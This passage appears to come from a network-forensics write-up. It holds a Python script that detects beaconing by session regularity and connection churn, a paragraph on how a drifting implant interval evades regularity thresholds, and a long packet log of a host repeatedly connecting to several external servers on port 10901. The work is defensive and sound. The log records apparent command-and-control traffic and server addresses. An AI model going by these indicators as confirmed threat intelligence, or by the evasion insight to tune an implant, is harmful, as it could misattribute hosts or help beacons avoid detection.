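    ("10:35:59.249573946", 57628, 10901, "192.168.2.7", "3.127.138.57"),
    ("10:36:03.200401068", 57641, 10901, "192.168.2.7", "3.127.138.57"),
    ("10:36:06.793628931", 57642, 10901, "192.168.2.7", "3.127.138.57"),
    ("10:36:09.512044907", 57643, 10901, "192.168.2.7", "3.127.138.57"),
    ("10:36:11.748497009", 57644, 10901, "192.168.2.7", "3.127.138.57"),
    ("10:36:14.902976036", 57645, 10901, "192.168.2.7", "3.127.138.57"),
    ("10:36:17.423302889", 57646, 10901, "192.168.2.7", "3.127.138.57"),
    ("10:36:19.527875900", 57647, 10901, "192.168.2.7", "3.127.138.57"),
    ("10:36:21.465656996", 57648, 10901, "192.168.2.7", "3.127.138.57"),
    ("10:36:23.121601105", 57649, 10901, "192.168.2.7", "3.127.138.57"),
    ("10:36:24.809772968", 57650, 10901, "192.168.2.7", "3.127.138.57"),
]


def to_seconds(ts):
    """'HH:MM:SS.fffffffff' -> seconds since midnight as a float."""
    hh, mm, ss = ts.split(":")
    return int(hh) * 3600 + int(mm) * 60 + float(ss)


def session_starts(flows):
    """Group packets into sessions by endpoint pair.  The first packet seen for a
    pair is the client's SYN, so its source is the client.  Returns
    {(client_ip, server_ip, server_port): sorted session start times}."""
    first = {}
    for ts, sport, dport, sip, dip in flows:
        pair = frozenset({(sip, sport), (dip, dport)})
        if pair not in first:            # later packets in either direction: same session
            first[pair] = (to_seconds(ts), sip, dip, dport)
    starts = defaultdict(list)
    for t, cip, srv_ip, srv_port in first.values():
        starts[(cip, srv_ip, srv_port)].append(t)
    return {k: sorted(v) for k, v in starts.items()}


def beacon_report(flows, min_sessions=5, max_cv=0.25, max_mean_gap=10.0):
    """Two complementary rules per (client, server, port):
    periodic: gaps between session starts are regular (coefficient of variation <= max_cv);
    churn:    at least min_sessions sessions with a mean gap <= max_mean_gap seconds,
              which also catches a beacon whose interval drifts."""
    report = {}
    for key, starts in session_starts(flows).items():
        gaps = [b - a for a, b in zip(starts, starts[1:])]
        n = len(starts)
        if gaps:
            mg = mean(gaps)
            cv = pstdev(gaps) / mg
        else:
            mg = cv = None
        report[key] = {
            "sessions": n,
            "mean_gap": mg,
            "cv": cv,
            "periodic": n >= min_sessions and cv is not None and cv <= max_cv,
            "churn": n >= min_sessions and mg is not None and mg <= max_mean_gap,
        }
    return report


if __name__ == "__main__":
    for (cip, sip, port), r in beacon_report(FLOWS).items():
        print(f"{cip} -> {sip}:{port}  sessions={r['sessions']}  mean_gap={r['mean_gap']}  "
              f"cv={r['cv']}  periodic={r['periodic']}  churn={r['churn']}")
```

On these rows the 3.126.37.18 phase has seven sessions with a mean gap near 4.2 s and a coefficient of variation around 0.06, so both rules fire; the 3.127.138.57 phase has thirteen sessions whose gap shrinks from 4.1 s to 1.7 s, giving a coefficient of variation around 0.30, so only the churn rule fires. That is the caveat worth keeping in mind when writing beacon detections: a tight regularity threshold alone misses an implant whose interval drifts, while a connection-count-per-window rule against a single unregistered port is indifferent to the drift. The DNS exchange reuses one source port and yields a single session, so it is not flagged by either rule.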
Timestamp                            Source Port  Dest Port  Source IP     Dest IP
Jan 30, 2025 10:35:21.990950108 CET  49725  10901  192.168.2.7  3.126.37.18
Jan 30, 2025 10:35:21.997144938 CET  10901  49725  3.126.37.18  192.168.2.7
Jan 30, 2025 10:35:21.997221947 CET  49725  10901  192.168.2.7  3.126.37.18
Jan 30, 2025 10:35:22.240994930 CET  49725  10901  192.168.2.7  3.126.37.18
Jan 30, 2025 10:35:22.245821953 CET  10901  49725  3.126.37.18  192.168.2.7
Jan 30, 2025 10:35:23.613183022 CET  10901  49725  3.126.37.18  192.168.2.7
Jan 30, 2025 10:35:23.613331079 CET  49725  10901  192.168.2.7  3.126.37.18
Jan 30, 2025 10:35:26.229598045 CET  49725  10901  192.168.2.7  3.126.37.18
Jan 30, 2025 10:35:26.231295109 CET  49752  10901  192.168.2.7  3.126.37.18
Jan 30, 2025 10:35:26.234390020 CET  10901  49725  3.126.37.18  192.168.2.7
Jan 30, 2025 10:35:26.236099005 CET  10901  49752  3.126.37.18  192.168.2.7
Jan 30, 2025 10:35:26.236350060 CET  49752  10901  192.168.2.7  3.126.37.18
Jan 30, 2025 10:35:26.251430035 CET  49752  10901  192.168.2.7  3.126.37.18
Jan 30, 2025 10:35:26.256172895 CET  10901  49752  3.126.37.18  192.168.2.7
Jan 30, 2025 10:35:27.894623995 CET  10901  49752  3.126.37.18  192.168.2.7
Jan 30, 2025 10:35:27.894720078 CET  49752  10901  192.168.2.7  3.126.37.18
Jan 30, 2025 10:35:30.122191906 CET  49752  10901  192.168.2.7  3.126.37.18
Jan 30, 2025 10:35:30.126604080 CET  49780  10901  192.168.2.7  3.126.37.18
Jan 30, 2025 10:35:30.128134012 CET  10901  49752  3.126.37.18  192.168.2.7
Jan 30, 2025 10:35:30.132461071 CET  10901  49780  3.126.37.18  192.168.2.7
Jan 30, 2025 10:35:30.132554054 CET  49780  10901  192.168.2.7  3.126.37.18
Jan 30, 2025 10:35:30.182240963 CET  49780  10901  192.168.2.7  3.126.37.18
Jan 30, 2025 10:35:30.187037945 CET  10901  49780  3.126.37.18  192.168.2.7
Jan 30, 2025 10:35:31.755564928 CET  10901  49780  3.126.37.18  192.168.2.7
Jan 30, 2025 10:35:31.755655050 CET  49780  10901  192.168.2.7  3.126.37.18
Jan 30, 2025 10:35:34.650415897 CET  49780  10901  192.168.2.7  3.126.37.18
Jan 30, 2025 10:35:34.654441118 CET  49808  10901  192.168.2.7  3.126.37.18
Jan 30, 2025 10:35:34.655200005 CET  10901  49780  3.126.37.18  192.168.2.7
Jan 30, 2025 10:35:34.659317970 CET  10901  49808  3.126.37.18  192.168.2.7
Jan 30, 2025 10:35:34.659389973 CET  49808  10901  192.168.2.7  3.126.37.18
Jan 30, 2025 10:35:34.900612116 CET  49808  10901  192.168.2.7  3.126.37.18
Jan 30, 2025 10:35:34.905441999 CET  10901  49808  3.126.37.18  192.168.2.7
Jan 30, 2025 10:35:36.266134977 CET  10901  49808  3.126.37.18  192.168.2.7
Jan 30, 2025 10:35:36.266745090 CET  49808  10901  192.168.2.7  3.126.37.18
Jan 30, 2025 10:35:38.526618958 CET  49808  10901  192.168.2.7  3.126.37.18
Jan 30, 2025 10:35:38.528335094 CET  49834  10901  192.168.2.7  3.126.37.18
Jan 30, 2025 10:35:38.531421900 CET  10901  49808  3.126.37.18  192.168.2.7
Jan 30, 2025 10:35:38.533159018 CET  10901  49834  3.126.37.18  192.168.2.7
Jan 30, 2025 10:35:38.533509016 CET  49834  10901  192.168.2.7  3.126.37.18
Jan 30, 2025 10:35:38.548571110 CET  49834  10901  192.168.2.7  3.126.37.18
Jan 30, 2025 10:35:38.553311110 CET  10901  49834  3.126.37.18  192.168.2.7
Jan 30, 2025 10:35:40.162693977 CET  10901  49834  3.126.37.18  192.168.2.7
Jan 30, 2025 10:35:40.162945986 CET  49834  10901  192.168.2.7  3.126.37.18
Jan 30, 2025 10:35:42.901607990 CET  49834  10901  192.168.2.7  3.126.37.18
Jan 30, 2025 10:35:42.902971983 CET  49865  10901  192.168.2.7  3.126.37.18
Jan 30, 2025 10:35:42.906457901 CET  10901  49834  3.126.37.18  192.168.2.7
Jan 30, 2025 10:35:42.907959938 CET  10901  49865  3.126.37.18  192.168.2.7
Jan 30, 2025 10:35:42.908046007 CET  49865  10901  192.168.2.7  3.126.37.18
Jan 30, 2025 10:35:42.923887014 CET  49865  10901  192.168.2.7  3.126.37.18
Jan 30, 2025 10:35:42.930419922 CET  10901  49865  3.126.37.18  192.168.2.7
Jan 30, 2025 10:35:44.524271011 CET  10901  49865  3.126.37.18  192.168.2.7
Jan 30, 2025 10:35:44.524389982 CET  49865  10901  192.168.2.7  3.126.37.18
Jan 30, 2025 10:35:47.286498070 CET  49865  10901  192.168.2.7  3.126.37.18
Jan 30, 2025 10:35:47.291517019 CET  10901  49865  3.126.37.18  192.168.2.7
Jan 30, 2025 10:35:47.297401905 CET  49891  10901  192.168.2.7  3.126.37.18
Jan 30, 2025 10:35:47.302238941 CET  10901  49891  3.126.37.18  192.168.2.7
Jan 30, 2025 10:35:47.302321911 CET  49891  10901  192.168.2.7  3.126.37.18
Jan 30, 2025 10:35:47.604543924 CET  49891  10901  192.168.2.7  3.126.37.18
Jan 30, 2025 10:35:47.609328032 CET  10901  49891  3.126.37.18  192.168.2.7
Jan 30, 2025 10:35:48.943802118 CET  57556  53     192.168.2.7  162.159.36.2
Jan 30, 2025 10:35:48.948596001 CET  53     57556  162.159.36.2  192.168.2.7
Jan 30, 2025 10:35:48.951186895 CET  57556  53     192.168.2.7  162.159.36.2
Jan 30, 2025 10:35:48.956265926 CET  53     57556  162.159.36.2  192.168.2.7
Jan 30, 2025 10:35:48.964245081 CET  10901  49891  3.126.37.18  192.168.2.7
Jan 30, 2025 10:35:48.966569901 CET  49891  10901  192.168.2.7  3.126.37.18
Jan 30, 2025 10:35:49.415673018 CET  57556  53     192.168.2.7  162.159.36.2
Jan 30, 2025 10:35:49.420727968 CET  53     57556  162.159.36.2  192.168.2.7
Jan 30, 2025 10:35:49.420830011 CET  57556  53     192.168.2.7  162.159.36.2
Jan 30, 2025 10:35:51.620111942 CET  49891  10901  192.168.2.7  3.126.37.18
Jan 30, 2025 10:35:51.624918938 CET  10901  49891  3.126.37.18  192.168.2.7
Jan 30, 2025 10:35:51.644072056 CET  57576  10901  192.168.2.7  3.127.138.57
Jan 30, 2025 10:35:51.648921013 CET  10901  57576  3.127.138.57  192.168.2.7
Jan 30, 2025 10:35:51.649034023 CET  57576  10901  192.168.2.7  3.127.138.57
Jan 30, 2025 10:35:51.667026997 CET  57576  10901  192.168.2.7  3.127.138.57
Jan 30, 2025 10:35:51.671835899 CET  10901  57576  3.127.138.57  192.168.2.7
Jan 30, 2025 10:35:53.308489084 CET  10901  57576  3.127.138.57  192.168.2.7
Jan 30, 2025 10:35:53.308597088 CET  57576  10901  192.168.2.7  3.127.138.57
Jan 30, 2025 10:35:55.729573965 CET  57576  10901  192.168.2.7  3.127.138.57
Jan 30, 2025 10:35:55.731884956 CET  57605  10901  192.168.2.7  3.127.138.57
Jan 30, 2025 10:35:55.734426022 CET  10901  57576  3.127.138.57  192.168.2.7
Jan 30, 2025 10:35:55.738245964 CET  10901  57605  3.127.138.57  192.168.2.7
Jan 30, 2025 10:35:55.738351107 CET  57605  10901  192.168.2.7  3.127.138.57
Jan 30, 2025 10:35:55.756119967 CET  57605  10901  192.168.2.7  3.127.138.57
Jan 30, 2025 10:35:55.760996103 CET  10901  57605  3.127.138.57  192.168.2.7
Jan 30, 2025 10:35:57.395215988 CET  10901  57605  3.127.138.57  192.168.2.7
Jan 30, 2025 10:35:57.396661043 CET  57605  10901  192.168.2.7  3.127.138.57
Jan 30, 2025 10:35:59.245270967 CET  57605  10901  192.168.2.7  3.127.138.57
Jan 30, 2025 10:35:59.249573946 CET  57628  10901  192.168.2.7  3.127.138.57
Jan 30, 2025 10:35:59.250108957 CET  10901  57605  3.127.138.57  192.168.2.7
Jan 30, 2025 10:35:59.254373074 CET  10901  57628  3.127.138.57  192.168.2.7
Jan 30, 2025 10:35:59.254504919 CET  57628  10901  192.168.2.7  3.127.138.57
Jan 30, 2025 10:35:59.350455999 CET  57628  10901  192.168.2.7  3.127.138.57
Jan 30, 2025 10:35:59.355272055 CET  10901  57628  3.127.138.57  192.168.2.7
Jan 30, 2025 10:36:00.913491964 CET  10901  57628  3.127.138.57  192.168.2.7
Jan 30, 2025 10:36:00.913589954 CET  57628  10901  192.168.2.7  3.127.138.57
Jan 30, 2025 10:36:03.198389053 CET  57628  10901  192.168.2.7  3.127.138.57
Jan 30, 2025 10:36:03.200401068 CET  57641  10901  192.168.2.7  3.127.138.57
Jan 30, 2025 10:36:03.203373909 CET  10901  57628  3.127.138.57  192.168.2.7
Jan 30, 2025 10:36:03.205233097 CET  10901  57641  3.127.138.57  192.168.2.7
Jan 30, 2025 10:36:03.205312014 CET  57641  10901  192.168.2.7  3.127.138.57
Jan 30, 2025 10:36:03.219688892 CET  57641  10901  192.168.2.7  3.127.138.57
Jan 30, 2025 10:36:03.224464893 CET  10901  57641  3.127.138.57  192.168.2.7
Jan 30, 2025 10:36:04.851828098 CET  10901  57641  3.127.138.57  192.168.2.7
Jan 30, 2025 10:36:04.851918936 CET  57641  10901  192.168.2.7  3.127.138.57
Jan 30, 2025 10:36:06.792020082 CET  57641  10901  192.168.2.7  3.127.138.57
Jan 30, 2025 10:36:06.793628931 CET  57642  10901  192.168.2.7  3.127.138.57
Jan 30, 2025 10:36:06.797094107 CET  10901  57641  3.127.138.57  192.168.2.7
Jan 30, 2025 10:36:06.798813105 CET  10901  57642  3.127.138.57  192.168.2.7
Jan 30, 2025 10:36:06.798892975 CET  57642  10901  192.168.2.7  3.127.138.57
Jan 30, 2025 10:36:06.823189020 CET  57642  10901  192.168.2.7  3.127.138.57
Jan 30, 2025 10:36:06.828571081 CET  10901  57642  3.127.138.57  192.168.2.7
Jan 30, 2025 10:36:08.467432976 CET  10901  57642  3.127.138.57  192.168.2.7
Jan 30, 2025 10:36:08.467556953 CET  57642  10901  192.168.2.7  3.127.138.57
Jan 30, 2025 10:36:09.510832071 CET  57642  10901  192.168.2.7  3.127.138.57
Jan 30, 2025 10:36:09.512044907 CET  57643  10901  192.168.2.7  3.127.138.57
Jan 30, 2025 10:36:09.517913103 CET  10901  57642  3.127.138.57  192.168.2.7
Jan 30, 2025 10:36:09.518884897 CET  10901  57643  3.127.138.57  192.168.2.7
Jan 30, 2025 10:36:09.518963099 CET  57643  10901  192.168.2.7  3.127.138.57
Jan 30, 2025 10:36:09.534013987 CET  57643  10901  192.168.2.7  3.127.138.57
Jan 30, 2025 10:36:09.540903091 CET  10901  57643  3.127.138.57  192.168.2.7
Jan 30, 2025 10:36:11.183276892 CET  10901  57643  3.127.138.57  192.168.2.7
Jan 30, 2025 10:36:11.185611963 CET  57643  10901  192.168.2.7  3.127.138.57
Jan 30, 2025 10:36:11.745310068 CET  57643  10901  192.168.2.7  3.127.138.57
Jan 30, 2025 10:36:11.748497009 CET  57644  10901  192.168.2.7  3.127.138.57
Jan 30, 2025 10:36:11.750228882 CET  10901  57643  3.127.138.57  192.168.2.7
Jan 30, 2025 10:36:11.757121086 CET  10901  57644  3.127.138.57  192.168.2.7
Jan 30, 2025 10:36:11.757205963 CET  57644  10901  192.168.2.7  3.127.138.57
Jan 30, 2025 10:36:11.785902977 CET  57644  10901  192.168.2.7  3.127.138.57
Jan 30, 2025 10:36:11.790720940 CET  10901  57644  3.127.138.57  192.168.2.7
Jan 30, 2025 10:36:13.398426056 CET  10901  57644  3.127.138.57  192.168.2.7
Jan 30, 2025 10:36:13.399154902 CET  57644  10901  192.168.2.7  3.127.138.57
Jan 30, 2025 10:36:14.901563883 CET  57644  10901  192.168.2.7  3.127.138.57
Jan 30, 2025 10:36:14.902976036 CET  57645  10901  192.168.2.7  3.127.138.57
Jan 30, 2025 10:36:14.906691074 CET  10901  57644  3.127.138.57  192.168.2.7
Jan 30, 2025 10:36:14.908010006 CET  10901  57645  3.127.138.57  192.168.2.7
Jan 30, 2025 10:36:14.908107996 CET  57645  10901  192.168.2.7  3.127.138.57
Jan 30, 2025 10:36:14.923120975 CET  57645  10901  192.168.2.7  3.127.138.57
Jan 30, 2025 10:36:14.927985907 CET  10901  57645  3.127.138.57  192.168.2.7
Jan 30, 2025 10:36:16.537183046 CET  10901  57645  3.127.138.57  192.168.2.7
Jan 30, 2025 10:36:16.538757086 CET  57645  10901  192.168.2.7  3.127.138.57
Jan 30, 2025 10:36:17.420156002 CET  57645  10901  192.168.2.7  3.127.138.57
Jan 30, 2025 10:36:17.423302889 CET  57646  10901  192.168.2.7  3.127.138.57
Jan 30, 2025 10:36:17.425096035 CET  10901  57645  3.127.138.57  192.168.2.7
Jan 30, 2025 10:36:17.428169012 CET  10901  57646  3.127.138.57  192.168.2.7
Jan 30, 2025 10:36:17.428232908 CET  57646  10901  192.168.2.7  3.127.138.57
Jan 30, 2025 10:36:17.567450047 CET  57646  10901  192.168.2.7  3.127.138.57
Jan 30, 2025 10:36:17.572350979 CET  10901  57646  3.127.138.57  192.168.2.7
Jan 30, 2025 10:36:19.071722984 CET  10901  57646  3.127.138.57  192.168.2.7
Jan 30, 2025 10:36:19.072025061 CET  57646  10901  192.168.2.7  3.127.138.57
Jan 30, 2025 10:36:19.526509047 CET  57646  10901  192.168.2.7  3.127.138.57
Jan 30, 2025 10:36:19.527875900 CET  57647  10901  192.168.2.7  3.127.138.57
Jan 30, 2025 10:36:19.531445026 CET  10901  57646  3.127.138.57  192.168.2.7
Jan 30, 2025 10:36:19.532851934 CET  10901  57647  3.127.138.57  192.168.2.7
Jan 30, 2025 10:36:19.532970905 CET  57647  10901  192.168.2.7  3.127.138.57
Jan 30, 2025 10:36:19.553215981 CET  57647  10901  192.168.2.7  3.127.138.57
Jan 30, 2025 10:36:19.558150053 CET  10901  57647  3.127.138.57  192.168.2.7
Jan 30, 2025 10:36:21.182110071 CET  10901  57647  3.127.138.57  192.168.2.7
Jan 30, 2025 10:36:21.182220936 CET  57647  10901  192.168.2.7  3.127.138.57
Jan 30, 2025 10:36:21.463938951 CET  57647  10901  192.168.2.7  3.127.138.57
Jan 30, 2025 10:36:21.465656996 CET  57648  10901  192.168.2.7  3.127.138.57
Jan 30, 2025 10:36:21.469012022 CET  10901  57647  3.127.138.57  192.168.2.7
Jan 30, 2025 10:36:21.470513105 CET  10901  57648  3.127.138.57  192.168.2.7
Jan 30, 2025 10:36:21.470582008 CET  57648  10901  192.168.2.7  3.127.138.57
Jan 30, 2025 10:36:21.487997055 CET  57648  10901  192.168.2.7  3.127.138.57
Jan 30, 2025 10:36:21.493022919 CET  10901  57648  3.127.138.57  192.168.2.7
Jan 30, 2025 10:36:23.115958929 CET  10901  57648  3.127.138.57  192.168.2.7
Jan 30, 2025 10:36:23.116029978 CET  57648  10901  192.168.2.7  3.127.138.57
Jan 30, 2025 10:36:23.120462894 CET  57648  10901  192.168.2.7  3.127.138.57
Jan 30, 2025 10:36:23.121601105 CET  57649  10901  192.168.2.7  3.127.138.57
Jan 30, 2025 10:36:23.125283003 CET  10901  57648  3.127.138.57  192.168.2.7
Jan 30, 2025 10:36:23.126483917 CET  10901  57649  3.127.138.57  192.168.2.7
Jan 30, 2025 10:36:23.126547098 CET  57649  10901  192.168.2.7  3.127.138.57
Jan 30, 2025 10:36:23.145858049 CET  57649  10901  192.168.2.7  3.127.138.57
Jan 30, 2025 10:36:23.150706053 CET  10901  57649  3.127.138.57  192.168.2.7
Jan 30, 2025 10:36:24.793307066 CET  10901  57649  3.127.138.57  192.168.2.7
Jan 30, 2025 10:36:24.793412924 CET  57649  10901  192.168.2.7  3.127.138.57
Jan 30, 2025 10:36:24.807785034 CET  57649  10901  192.168.2.7  3.127.138.57
Jan 30, 2025 10:36:24.809772968 CET  57650  10901  192.168.2.7  3.127.138.57
Jan 30, 2025 10:36:24.812717915 CET  10901  57649  3.127.138.57  192.168.2.7
Jan 30, 2025 10:36:24.814636946 CET  10901  57650  3.127.138.57  192.168.2.7
Jan 30, 2025 10:36:24.814716101 CET  57650  10901  192.168.2.7  3.127.138.57
Jan 30, 2025 10:36:24.834207058 CET  57650  10901  192.168.2.7  3.127.138.57
Jan 30, 2025 10:36:24.838969946 CET  10901  57650  3.127.138.57  192.168.2.7
                                                                                      Jan 30, 2025 10:36:26.465965033 CET10901576503.127.138.57192.168.2.7
                                                                                      Jan 30, 2025 10:36:26.466053963 CET5765010901192.168.2.73.127.138.57
                                                                                      Jan 30, 2025 10:36:26.467936993 CET5765010901192.168.2.73.127.138.57
                                                                                      Jan 30, 2025 10:36:26.471085072 CET5765110901192.168.2.73.127.138.57
                                                                                      Jan 30, 2025 10:36:26.472770929 CET10901576503.127.138.57192.168.2.7
                                                                                      Jan 30, 2025 10:36:26.475989103 CET10901576513.127.138.57192.168.2.7
                                                                                      Jan 30, 2025 10:36:26.476083994 CET5765110901192.168.2.73.127.138.57
                                                                                      Jan 30, 2025 10:36:26.509310961 CET5765110901192.168.2.73.127.138.57
                                                                                      Jan 30, 2025 10:36:26.514281988 CET10901576513.127.138.57192.168.2.7
                                                                                      Jan 30, 2025 10:36:28.116590023 CET10901576513.127.138.57192.168.2.7
                                                                                      Jan 30, 2025 10:36:28.116736889 CET5765110901192.168.2.73.127.138.57
                                                                                      Jan 30, 2025 10:36:31.605005980 CET5765110901192.168.2.73.127.138.57
                                                                                      Jan 30, 2025 10:36:31.609862089 CET10901576513.127.138.57192.168.2.7
                                                                                      Jan 30, 2025 10:36:31.611696959 CET5765210901192.168.2.73.127.138.57
                                                                                      Jan 30, 2025 10:36:31.616565943 CET10901576523.127.138.57192.168.2.7
                                                                                      Jan 30, 2025 10:36:31.616643906 CET5765210901192.168.2.73.127.138.57
                                                                                      Jan 30, 2025 10:36:31.660885096 CET5765210901192.168.2.73.127.138.57
                                                                                      Jan 30, 2025 10:36:31.665703058 CET10901576523.127.138.57192.168.2.7
                                                                                      Jan 30, 2025 10:36:31.828608036 CET5765210901192.168.2.73.127.138.57
                                                                                      Jan 30, 2025 10:36:31.833391905 CET10901576523.127.138.57192.168.2.7
                                                                                      Jan 30, 2025 10:36:33.260293007 CET10901576523.127.138.57192.168.2.7
                                                                                      Jan 30, 2025 10:36:33.262665033 CET5765210901192.168.2.73.127.138.57
                                                                                      Jan 30, 2025 10:36:36.971477985 CET5765210901192.168.2.73.127.138.57
                                                                                      Jan 30, 2025 10:36:36.974751949 CET5765310901192.168.2.73.127.138.57
                                                                                      Jan 30, 2025 10:36:36.976491928 CET10901576523.127.138.57192.168.2.7
                                                                                      Jan 30, 2025 10:36:36.979567051 CET10901576533.127.138.57192.168.2.7
                                                                                      Jan 30, 2025 10:36:36.979754925 CET5765310901192.168.2.73.127.138.57
                                                                                      Jan 30, 2025 10:36:37.078603983 CET5765310901192.168.2.73.127.138.57
                                                                                      Jan 30, 2025 10:36:37.085719109 CET10901576533.127.138.57192.168.2.7
                                                                                      Jan 30, 2025 10:36:37.672334909 CET5765310901192.168.2.73.127.138.57
                                                                                      Jan 30, 2025 10:36:37.679038048 CET10901576533.127.138.57192.168.2.7
                                                                                      Jan 30, 2025 10:36:38.616494894 CET10901576533.127.138.57192.168.2.7
                                                                                      Jan 30, 2025 10:36:38.616589069 CET5765310901192.168.2.73.127.138.57
                                                                                      Jan 30, 2025 10:36:42.198534966 CET5765310901192.168.2.73.127.138.57
                                                                                      Jan 30, 2025 10:36:42.200196981 CET5765410901192.168.2.73.127.138.57
                                                                                      Jan 30, 2025 10:36:42.203327894 CET10901576533.127.138.57192.168.2.7
                                                                                      Jan 30, 2025 10:36:42.204967976 CET10901576543.127.138.57192.168.2.7
                                                                                      Jan 30, 2025 10:36:42.205025911 CET5765410901192.168.2.73.127.138.57
                                                                                      Jan 30, 2025 10:36:42.239377975 CET5765410901192.168.2.73.127.138.57
                                                                                      Jan 30, 2025 10:36:42.244236946 CET10901576543.127.138.57192.168.2.7
                                                                                      Jan 30, 2025 10:36:42.245510101 CET5765410901192.168.2.73.127.138.57
                                                                                      Jan 30, 2025 10:36:42.250314951 CET10901576543.127.138.57192.168.2.7
                                                                                      Jan 30, 2025 10:36:42.260953903 CET5765410901192.168.2.73.127.138.57
                                                                                      Jan 30, 2025 10:36:42.265782118 CET10901576543.127.138.57192.168.2.7
                                                                                      Jan 30, 2025 10:36:42.323683023 CET5765410901192.168.2.73.127.138.57
                                                                                      Jan 30, 2025 10:36:42.328501940 CET10901576543.127.138.57192.168.2.7
                                                                                      Jan 30, 2025 10:36:42.339567900 CET5765410901192.168.2.73.127.138.57
                                                                                      Jan 30, 2025 10:36:42.344506979 CET10901576543.127.138.57192.168.2.7
                                                                                      Jan 30, 2025 10:36:42.433837891 CET5765410901192.168.2.73.127.138.57
                                                                                      Jan 30, 2025 10:36:42.438606977 CET10901576543.127.138.57192.168.2.7
                                                                                      Jan 30, 2025 10:36:42.448571920 CET5765410901192.168.2.73.127.138.57
                                                                                      Jan 30, 2025 10:36:42.453361988 CET10901576543.127.138.57192.168.2.7
                                                                                      Jan 30, 2025 10:36:42.495517015 CET5765410901192.168.2.73.127.138.57
                                                                                      Jan 30, 2025 10:36:42.500293016 CET10901576543.127.138.57192.168.2.7
                                                                                      Jan 30, 2025 10:36:42.543006897 CET5765410901192.168.2.73.127.138.57
                                                                                      Jan 30, 2025 10:36:42.547765017 CET10901576543.127.138.57192.168.2.7
                                                                                      Jan 30, 2025 10:36:42.667397976 CET5765410901192.168.2.73.127.138.57
                                                                                      Jan 30, 2025 10:36:42.674190998 CET10901576543.127.138.57192.168.2.7
                                                                                      Jan 30, 2025 10:36:42.682907104 CET5765410901192.168.2.73.127.138.57
                                                                                      Jan 30, 2025 10:36:42.687683105 CET10901576543.127.138.57192.168.2.7
                                                                                      Jan 30, 2025 10:36:42.714229107 CET5765410901192.168.2.73.127.138.57
                                                                                      Jan 30, 2025 10:36:42.719892025 CET10901576543.127.138.57192.168.2.7
                                                                                      Jan 30, 2025 10:36:42.729908943 CET5765410901192.168.2.73.127.138.57
                                                                                      Jan 30, 2025 10:36:42.737323999 CET10901576543.127.138.57192.168.2.7
                                                                                      Jan 30, 2025 10:36:42.761066914 CET5765410901192.168.2.73.127.138.57
                                                                                      Jan 30, 2025 10:36:42.767465115 CET10901576543.127.138.57192.168.2.7
                                                                                      Jan 30, 2025 10:36:43.850296021 CET10901576543.127.138.57192.168.2.7
                                                                                      Jan 30, 2025 10:36:43.852607965 CET5765410901192.168.2.73.127.138.57
                                                                                      Jan 30, 2025 10:36:47.778261900 CET5765410901192.168.2.73.127.138.57
                                                                                      Jan 30, 2025 10:36:47.778269053 CET5765510901192.168.2.73.127.138.57
                                                                                      Jan 30, 2025 10:36:47.784883022 CET10901576543.127.138.57192.168.2.7
                                                                                      Jan 30, 2025 10:36:47.784903049 CET10901576553.127.138.57192.168.2.7
                                                                                      Jan 30, 2025 10:36:47.785156965 CET5765510901192.168.2.73.127.138.57
                                                                                      Jan 30, 2025 10:36:47.850152016 CET5765510901192.168.2.73.127.138.57
                                                                                      Jan 30, 2025 10:36:47.855053902 CET10901576553.127.138.57192.168.2.7
                                                                                      Jan 30, 2025 10:36:47.870776892 CET5765510901192.168.2.73.127.138.57
                                                                                      Jan 30, 2025 10:36:47.875562906 CET10901576553.127.138.57192.168.2.7
                                                                                      Jan 30, 2025 10:36:48.011141062 CET5765510901192.168.2.73.127.138.57
                                                                                      Jan 30, 2025 10:36:48.016053915 CET10901576553.127.138.57192.168.2.7
                                                                                      Jan 30, 2025 10:36:48.042602062 CET5765510901192.168.2.73.127.138.57
                                                                                      Jan 30, 2025 10:36:48.047475100 CET10901576553.127.138.57192.168.2.7
                                                                                      Jan 30, 2025 10:36:48.183140039 CET5765510901192.168.2.73.127.138.57
                                                                                      Jan 30, 2025 10:36:48.187930107 CET10901576553.127.138.57192.168.2.7
                                                                                      Jan 30, 2025 10:36:48.261296034 CET5765510901192.168.2.73.127.138.57
                                                                                      Jan 30, 2025 10:36:48.266133070 CET10901576553.127.138.57192.168.2.7
                                                                                      Jan 30, 2025 10:36:48.370738029 CET5765510901192.168.2.73.127.138.57
                                                                                      Jan 30, 2025 10:36:48.375708103 CET10901576553.127.138.57192.168.2.7
                                                                                      Jan 30, 2025 10:36:48.386167049 CET5765510901192.168.2.73.127.138.57
                                                                                      Jan 30, 2025 10:36:48.391082048 CET10901576553.127.138.57192.168.2.7
                                                                                      Jan 30, 2025 10:36:48.448565006 CET5765510901192.168.2.73.127.138.57
                                                                                      Jan 30, 2025 10:36:48.453358889 CET10901576553.127.138.57192.168.2.7
                                                                                      Jan 30, 2025 10:36:48.495461941 CET5765510901192.168.2.73.127.138.57
                                                                                      Jan 30, 2025 10:36:48.500308037 CET10901576553.127.138.57192.168.2.7
                                                                                      Jan 30, 2025 10:36:48.511193991 CET5765510901192.168.2.73.127.138.57
                                                                                      Jan 30, 2025 10:36:48.515986919 CET10901576553.127.138.57192.168.2.7
                                                                                      Jan 30, 2025 10:36:48.526947021 CET5765510901192.168.2.73.127.138.57
                                                                                      Jan 30, 2025 10:36:48.531829119 CET10901576553.127.138.57192.168.2.7
                                                                                      Jan 30, 2025 10:36:48.589329958 CET5765510901192.168.2.73.127.138.57
                                                                                      Jan 30, 2025 10:36:48.594122887 CET10901576553.127.138.57192.168.2.7
                                                                                      Jan 30, 2025 10:36:48.698925972 CET5765510901192.168.2.73.127.138.57
                                                                                      Jan 30, 2025 10:36:48.703704119 CET10901576553.127.138.57192.168.2.7
                                                                                      Jan 30, 2025 10:36:48.715904951 CET5765510901192.168.2.73.127.138.57
                                                                                      Jan 30, 2025 10:36:48.720710993 CET10901576553.127.138.57192.168.2.7
                                                                                      Jan 30, 2025 10:36:48.948924065 CET5765510901192.168.2.73.127.138.57
                                                                                      Jan 30, 2025 10:36:48.953732967 CET10901576553.127.138.57192.168.2.7
                                                                                      Jan 30, 2025 10:36:49.430716038 CET10901576553.127.138.57192.168.2.7
                                                                                      Jan 30, 2025 10:36:49.430891037 CET5765510901192.168.2.73.127.138.57
                                                                                      Jan 30, 2025 10:36:53.948616982 CET5765510901192.168.2.73.127.138.57
                                                                                      Jan 30, 2025 10:36:53.954117060 CET10901576553.127.138.57192.168.2.7
                                                                                      Jan 30, 2025 10:36:53.959577084 CET5765610901192.168.2.718.157.68.73
                                                                                      Jan 30, 2025 10:36:53.964467049 CET109015765618.157.68.73192.168.2.7
                                                                                      Jan 30, 2025 10:36:53.964541912 CET5765610901192.168.2.718.157.68.73
                                                                                      Jan 30, 2025 10:36:54.003854990 CET5765610901192.168.2.718.157.68.73
